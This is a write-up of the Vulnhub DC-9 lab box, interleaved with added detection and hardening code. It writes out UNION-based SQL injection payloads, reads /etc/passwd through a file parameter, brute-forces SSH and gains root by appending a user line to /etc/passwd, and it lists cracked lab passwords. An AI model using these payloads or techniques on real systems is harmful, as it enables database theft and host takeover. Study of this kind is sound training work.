# Vulnhub-DC 9
## NMAP
```bash
nmap -sC -sV 192.168.1.7
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-16 09:31 PKT
Nmap scan report for 192.168.1.7
Host is up (0.00021s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
| 256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_ 256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 08:00:27:1B:8F:38 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## PORT 80 (HTTP)
Going to `Display All Records`
we can see information about the users
There is also a login page, so let's try some basic SQLi
I tried `admin ' or 1=1 #` and `admin' or 1=1 -- `, but both failed
Going over to `search.php` we can see that it searches for a name, so let's supply the name `mary` since information for that user exists
Here let's perform the query `mary' and 1=1 # ` to see if it still returns mary's information
It does, so we can actually do SQLi here, but first we need to identify how many columns there are. To do that we are going to utilize `order by`, which sorts by the column number provided; we keep increasing the number until we get no response, so:
`mary' order by 1 #`
I kept getting results up to 6 columns, but after that I got no response
Which means we have 6 columns, so we can now perform the SQL injection
`mary' union select version(),user(),database(),4,5,6 #`
This machine is using MariaDB, the database user is `dbuser` and the database name is `Staff`. Now we need to extract the table names, then the columns, and then exfiltrate the data
We can also run a query that gives us the names of all databases
```
mary' union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata #
```
So there are two databases, but right now let's just focus on `Staff`
```
mary' union select group_concat(table_name),2,3,4,5,6 from information_schema.tables where table_schema=database() #
```
We have two tables, `StaffDetails` and `Users`, so let's see the column names for the `Users` table
```
mary' union select group_concat(column_name),2,3,4,5,6 from information_schema.columns where table_name='Users' #
```
We have the column names; we are interested in the username and password columns, so let's just extract the data
And we got the usernames and password hashes. This could have been done easily with sqlmap by intercepting the request to `search.php`, saving it to a file and running sqlmap against it
Let's visit CrackStation
As soon as we log in we get an error
I tried the parameter `file` and got the contents of `/etc/passwd`
So I copied the results into a file and grabbed only the users
Now remember that we had 2 databases, `Staff` and `users`; let's use sqlmap to dump data from the `users` database
I have already saved the usernames, so let's just grab the passwords and start brute forcing against SSH
But SSH is filtered, so first we are going to see whether we can find a port-knocking configuration
Now we can perform port knocking to open the SSH port
We found 2 passwords by brute forcing
After logging in as `janitor` we can find more passwords
Let's add those passwords and try brute forcing again
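From the defender's side, the whole enumeration above leaves a very recognisable trail in the web server log: a boolean tautology, a run of `order by N` probes with increasing N, then `union select ... information_schema`. The following is an added example (not part of this writeup and not code from the DC-9 box) that scans constructed Apache access-log lines for exactly those signatures and reports the per-client `order by` sweep. It assumes the search term travels in a GET parameter called `search`; a real `search.php` form posting its body would need application-level or WAF logging, since the access log does not record POST bodies. The fix on the application side is a parameterised query, which these signatures only help you notice, not prevent.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed Apache access-log lines (not traffic from the DC-9 box) that mirror
# the probing sequence in the writeup: baseline search, boolean tautology, an
# ORDER BY column sweep, then a UNION SELECT against information_schema.
# Client IPs, timestamps and the GET parameter name "search" are assumptions.
SAMPLE_LOG = """\
10.0.0.5 - - [16/May/2021:09:40:01 +0500] "GET /search.php?search=mary HTTP/1.1" 200 1843
10.0.0.5 - - [16/May/2021:09:40:12 +0500] "GET /search.php?search=mary%27+and+1%3D1+%23 HTTP/1.1" 200 1843
10.0.0.5 - - [16/May/2021:09:40:20 +0500] "GET /search.php?search=mary%27+order+by+1+%23 HTTP/1.1" 200 1843
10.0.0.5 - - [16/May/2021:09:40:24 +0500] "GET /search.php?search=mary%27+order+by+3+%23 HTTP/1.1" 200 1843
10.0.0.5 - - [16/May/2021:09:40:29 +0500] "GET /search.php?search=mary%27+order+by+6+%23 HTTP/1.1" 200 1843
10.0.0.5 - - [16/May/2021:09:40:33 +0500] "GET /search.php?search=mary%27+order+by+7+%23 HTTP/1.1" 200 512
10.0.0.5 - - [16/May/2021:09:41:02 +0500] "GET /search.php?search=mary%27+union+select+1%2Cgroup_concat%28schema_name%29%2C3%2C4%2C5%2C6+from+information_schema.schemata+%23 HTTP/1.1" 200 1910
10.0.0.9 - - [16/May/2021:09:41:30 +0500] "GET /search.php?search=O%27Brien HTTP/1.1" 200 1790
"""

# Apache "common" format: client, identd, user, [timestamp], "request", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

ORDER_BY_RE = re.compile(r"\border\s+by\s+(\d+)")

# (name, regex applied to the normalised parameter value)
SIGNATURES = [
    ("tautology", re.compile(r"'\s*(?:and|or)\s+\d+\s*=\s*\d+")),
    ("order_by_probe", ORDER_BY_RE),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("schema_enum", re.compile(r"\binformation_schema\.")),
]


def normalise(value: str) -> str:
    """Undo a second layer of URL encoding, lower-case, collapse whitespace."""
    decoded = unquote_plus(unquote_plus(value))
    return " ".join(decoded.lower().split())


def scan_log(text: str):
    """Return (hits, sweeps).

    hits   - one dict per request whose query parameter matched a signature
    sweeps - per-client summary of ORDER BY column probing (3+ distinct N)
    """
    hits = []
    probes = defaultdict(list)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for raw in values:
                value = normalise(raw)
                matched = [name for name, rx in SIGNATURES if rx.search(value)]
                if not matched:
                    continue
                hits.append({"ip": m["ip"], "time": m["ts"], "param": param,
                             "status": int(m["status"]), "signatures": matched,
                             "value": value})
                ob = ORDER_BY_RE.search(value)
                if ob:
                    probes[m["ip"]].append(int(ob.group(1)))
    sweeps = {ip: {"probes": sorted(set(ns)), "max_column": max(ns)}
              for ip, ns in probes.items() if len(set(ns)) >= 3}
    return hits, sweeps


if __name__ == "__main__":
    found, column_sweeps = scan_log(SAMPLE_LOG)
    for h in found:
        print(h["time"], h["ip"], ",".join(h["signatures"]), h["value"][:60])
    for ip, s in column_sweeps.items():
        print(f"{ip}: ORDER BY sweep over columns {s['probes']} (highest probed {s['max_column']})")
```

The legitimate `O'Brien` search is deliberately included: a bare apostrophe is not enough to alert on, which is why the signatures key on SQL keywords following the quote rather than on the quote itself.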
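The brute-force step relied on a list of usernames lifted from `/etc/passwd` and a short password list, which on the receiving end looks like one client cycling through many accounts in a few seconds, followed by successful logins from that same client. As an added example (not part of the writeup, and not from the DC-9 box), the code below parses constructed `sshd` syslog lines, flags a client that fails against several distinct users inside a short window, and lists any accounts that client logged into afterwards. Host name, client addresses, timestamps and the year used for the syslog dates are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log lines (not from the DC-9 box). Host, IPs, PIDs and
# timestamps are assumptions; user names reuse those mentioned in the writeup.
AUTH_LOG = """\
May 16 10:02:01 dc-9 sshd[1201]: Failed password for invalid user admin from 10.0.0.5 port 51002 ssh2
May 16 10:02:02 dc-9 sshd[1203]: Failed password for mary from 10.0.0.5 port 51004 ssh2
May 16 10:02:02 dc-9 sshd[1205]: Failed password for joeyt from 10.0.0.5 port 51006 ssh2
May 16 10:02:03 dc-9 sshd[1207]: Failed password for fredf from 10.0.0.5 port 51008 ssh2
May 16 10:02:04 dc-9 sshd[1209]: Accepted password for chandlerb from 10.0.0.5 port 51010 ssh2
May 16 10:02:05 dc-9 sshd[1211]: Failed password for janitor from 10.0.0.5 port 51012 ssh2
May 16 10:02:06 dc-9 sshd[1213]: Accepted password for janitor from 10.0.0.5 port 51014 ssh2
May 16 10:30:00 dc-9 sshd[1300]: Failed password for fredf from 10.0.0.77 port 40000 ssh2
May 16 10:31:00 dc-9 sshd[1302]: Accepted password for fredf from 10.0.0.77 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse(text: str, year: int = 2021):
    """Return (timestamp, ip, user, accepted) tuples; syslog carries no year, so one is supplied."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"], m["result"] == "Accepted"))
    return events


def detect_spray(text: str, window_s: int = 60, min_users: int = 4):
    """Flag clients that fail against >= min_users distinct accounts within window_s seconds.

    For each flagged client, also report accounts it successfully logged into
    at or after the moment it was flagged.
    """
    by_ip = defaultdict(list)
    for ev in parse(text):
        by_ip[ev[1]].append(ev)

    findings = {}
    for ip, evs in by_ip.items():
        evs.sort()
        failed = [e for e in evs if not e[3]]
        flagged_at = None
        for i, e in enumerate(failed):
            # failures from this client within the sliding window ending at e
            recent = [f for f in failed[:i + 1] if (e[0] - f[0]).total_seconds() <= window_s]
            if len({f[2] for f in recent}) >= min_users:
                flagged_at = e[0]
                break
        if flagged_at is None:
            continue
        later_successes = sorted({e[2] for e in evs if e[3] and e[0] >= flagged_at})
        findings[ip] = {
            "first_flag": flagged_at.strftime("%H:%M:%S"),
            "failed": len(failed),
            "users_tried": len({e[2] for e in failed}),
            "later_successes": later_successes,
        }
    return findings


if __name__ == "__main__":
    for ip, f in detect_spray(AUTH_LOG).items():
        print(f"{ip}: {f['users_tried']} users, {f['failed']} failures, "
              f"flagged at {f['first_flag']}, later logged in as {f['later_successes']}")
```

The single failed-then-successful login from `10.0.0.77` is left unflagged on purpose: a typo by a real user should not trip the rule, so the threshold is on distinct accounts per window rather than on failures alone. The "later successes" field is the part worth paging on, since it means a sprayed password actually worked.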
Switching to user `fredf`, we can see that this user can run the file `test` as sudo
It's a binary, so let's execute it and see what happens
Weird: it mentions `test.py`, a Python file which reads and appends, so we need to find that Python file
And we found it
Going through the source code: it takes 2 file arguments; it reads the contents of the first file into a variable, then appends them to the file we specify. We could exploit this by first adding a root user line to a file, then reading the contents from there and appending them to `/etc/passwd`
Now let's see whether this actually worked
This has added a user, so we can switch to this user and become root
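The root cause here is a sudo rule on a tool that appends arbitrary input to an arbitrary destination, so `/etc/passwd` is as good a target as any. Below is an added example (my own code, not the `test.py` from the DC-9 box) of how such a helper can be written so that the sudo rule is no longer an escalation path: the destination is resolved with `realpath` and must lie under a fixed directory, the final open refuses to follow a symlink, and the amount copied is capped. The allowed directory `/var/lib/appendtool` is a hypothetical default; `demo()` exercises the guard in a scratch directory and uses an ordinary file standing in for `/etc/passwd`.

```python
import os
import sys
import tempfile

# Hypothetical destination directory for this tool; the unrestricted test.py on
# the box has no such limit, which is what made the sudo rule exploitable.
ALLOWED_ROOT = "/var/lib/appendtool"
MAX_BYTES = 64 * 1024


def resolve_inside(path: str, root: str) -> str:
    """Resolve symlinks and '..', then require the result to sit under root."""
    real_root = os.path.realpath(root)
    real_path = os.path.realpath(path)
    if os.path.commonpath([real_root, real_path]) != real_root:
        raise PermissionError(f"{path} resolves outside {root}")
    return real_path


def safe_append(src: str, dst: str, root: str = ALLOWED_ROOT) -> int:
    """Append the contents of src to dst, only if dst lies under root.

    Returns the number of bytes appended.
    """
    target = resolve_inside(dst, root)
    with open(src, "rb") as f:
        data = f.read(MAX_BYTES + 1)
    if len(data) > MAX_BYTES:
        raise ValueError("source file too large")
    # O_NOFOLLOW (Linux/macOS) closes the gap between the realpath check and the
    # open: a symlink dropped into the directory after the check is refused.
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(target, flags, 0o644)
    with os.fdopen(fd, "ab") as out:
        out.write(data)
    return len(data)


def demo() -> dict:
    """Exercise the guard in a scratch directory and report what happened."""
    with tempfile.TemporaryDirectory() as work:
        root = os.path.join(work, "allowed")
        os.mkdir(root)
        src = os.path.join(work, "input.txt")
        with open(src, "w") as f:
            f.write("hello\n")

        inside = os.path.join(root, "notes.txt")
        appended = safe_append(src, inside, root)
        appended += safe_append(src, inside, root)
        with open(inside) as f:
            content = f.read()

        # An absolute path outside the root and a '..' escape must both be refused.
        # (work/passwd is a stand-in for /etc/passwd so the demo never touches it.)
        refused = 0
        for bad in (os.path.join(work, "passwd"), os.path.join(root, "..", "passwd")):
            try:
                safe_append(src, bad, root)
            except PermissionError:
                refused += 1
        return {"appended": appended, "content": content, "refused": refused}


if __name__ == "__main__":
    if len(sys.argv) == 3:
        print(safe_append(sys.argv[1], sys.argv[2]), "bytes appended")
    else:
        print(demo())
```

Even with these checks, the sudoers entry deserves the same review: `NOPASSWD` on anything that writes files is only safe when the destination set is fixed and none of those files influence authentication or privilege.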
```
admin:transorbital1
chandlerb:UrAG0D!
janitor: Ilovepeepee
joeyt: Passw0rd
fredf: B4-Tru3-001
```
```sql
mary' union select 1,2,3,4,5,6 #
mary' union select group_concat(table_name),2,3,4,5,6 from information_schema.tables where table_schema=database() #
mary' union select group_concat(column_name),2,3,4,5,6 from information_schema.columns where table_name='Users' #
mary' union select group_concat(Username),group_concat(Password),3,4,5,6 from Users #
mary' union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata #
```